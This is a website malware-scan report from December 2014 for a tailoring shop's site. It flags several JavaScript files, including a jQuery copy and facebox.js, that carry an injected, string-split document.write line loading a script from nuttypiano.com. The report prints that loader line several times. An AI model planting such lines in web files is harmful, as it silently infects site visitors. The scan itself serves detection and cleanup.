Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=drdenimoriginalhem.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://drdenimoriginalhem.com/ | 200 OK Content-Length: 6264 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8144 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4128 bytes skipped]... case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Readme.js"></scri'+'pt>'); Antivirus reports:
| ||
http://drdenimoriginalhem.com/iepngfix_tilebg.js | 200 OK Content-Length: 4287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3811 bytes skipped]... && t.src) { IEPNGFix.tileBG(t.elm, t.src); } } }; IEPNGFix.update.timer = 0; if (window.attachEvent && !window.opera) { window.attachEvent('onresize', function() { clearTimeout(IEPNGFix.update.timer); IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100); }); } document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Readme.js"></scri'+'pt>'); Antivirus reports:
| ||
http://drdenimoriginalhem.com/index.html | 200 OK Content-Length: 6264 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/contactus.html | 200 OK Content-Length: 6766 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/aboutus.html | 200 OK Content-Length: 7421 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/ourservices.html | 200 OK Content-Length: 16105 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/alternations.html | 200 OK Content-Length: 4756 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/complimentary.html | 200 OK Content-Length: 11653 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/facefiles/jquery-1.2.2.pack.js | 200 OK Content-Length: 373 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: nuttypiano.com /* * jQuery 1.2.2 - New Wave Javascript * * Copyright (c) 2007 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * $Date: 2008-01-14 17:56:07 -0500 (Mon, 14 Jan 2008) $ * $Rev: 4454 $ */ document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Readme.js"></scri'+'pt>'); | ||
http://drdenimoriginalhem.com/facefiles/facebox.js | 200 OK Content-Length: 6307 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4178 bytes skipped]... windowHeight = self.innerHeight; } else if (document.documentElement && document.documentElement.clientHeight) { windowHeight = document.documentElement.clientHeight; } else if (document.body) { windowHeight = document.body.clientHeight; } return windowHeight } })(jQuery); document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Readme.js"></scri'+'pt>'); Antivirus reports:
| ||
http://drdenimoriginalhem.com/specials.php | 200 OK Content-Length: 7349 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/locations.html | 200 OK Content-Length: 9111 Content-Type: text/html | clean |
http://drdenimoriginalhem.com/loc1.html | 200 OK Content-Length: 15804 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAz0Ef2NIJo27dTP4yJOWvQBQIxbNCAlmE4RQHCVRXCYWCMKP1jRSX0UJTh1Z1J6i5_v7VUJXUIR8ysQ | 200 OK Content-Length: 4334 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: drdenimoriginalhem.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:22:37 GMT
Accept-Ranges: bytes
ETag: "9079b8-1878-4f74087134fc0"
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Length: 6264
Content-Type: text/html
Last-Modified: Thu, 17 Apr 2014 17:40:23 GMT
...6264 bytes of data.
GET / HTTP/1.1
Host: drdenimoriginalhem.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:22:37 GMT
Accept-Ranges: bytes
ETag: "9079b8-1878-4f74087134fc0"
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Length: 6264
Content-Type: text/html
Last-Modified: Thu, 17 Apr 2014 17:40:23 GMT
...6264 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: drdenimoriginalhem.com
Referer: http://www.google.com/search?q=drdenimoriginalhem.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: drdenimoriginalhem.com
Referer: http://www.google.com/search?q=drdenimoriginalhem.com
Result:
The result is similar to the first query. There are no suspicious redirects found.